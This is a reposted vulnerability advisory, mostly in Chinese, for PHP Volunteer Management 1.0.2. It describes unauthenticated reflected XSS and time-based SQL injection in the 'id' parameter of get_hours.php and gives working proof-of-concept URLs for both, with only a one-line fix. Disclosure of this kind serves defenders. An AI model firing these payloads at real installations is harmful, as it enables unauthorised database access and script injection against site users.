网站地图    收藏   

主页 > 后端 > 网站安全 >

PHP Volunteer Management 1.0.2多个缺陷及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 标题: PHP Volunteer Management #39;id#39; 1.0.2 Multiple Vulnerabilities作者: G13 www.2cto.com下载地址: https://sourceforge.net/projects/phpvolunteer/影响版本: 1.0.20x01 描述0x02 XS......

标题: PHP Volunteer Management 'id' 1.0.2 Multiple Vulnerabilities
作者: G13 www.2cto.com
下载地址: https://sourceforge.net/projects/phpvolunteer/
影响版本: 1.0.2
 
0x01 描述
0x02 XSS
0x03 SQL Injection
0x04 Vendor 报告
 
##### 0x01概述 #####
 
This is a PHP Volunteer Management software. Keep track of Volunteer
hours worked and location assignments. This system is built on
PHP/MySql.
 
##### 0x02 XSS #####
 
---------------缺陷-------------------
 
The 'id' parameter on the get_hours.php page is vulnerable to XSS.  No
authentication is needed.  This is a reflective XSS vulnerability.
 
----------测试-----------------------------------
 
http://www.2cto.com /mods/hours/data/get_hours.php?id=[XSS]&take=10&skip=0&page=1&pageSize=10
 
------------利用---------------------------
 
http://www.2cto.com /mods/hours/data/get_hours.php?id=%27%22%3Cscript%3Ealert%281%29;%3C/script%3E&take=10&skip=0&page=1&pageSize=10
 
##### 0x03 SQL Injection #####
 
---------------缺陷-------------------
 
The 'id' parameter on the get_hours.php page is also vulnerable to SQL
Injection.  No authentication is needed.
 
----------测试-----------------------------------
 
http://localhost/mods/hours/data/get_hours.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
 
------------利用---------------------------
 
http://localhost/mods/hours/data/get_hours.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
 
修复:

相应过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论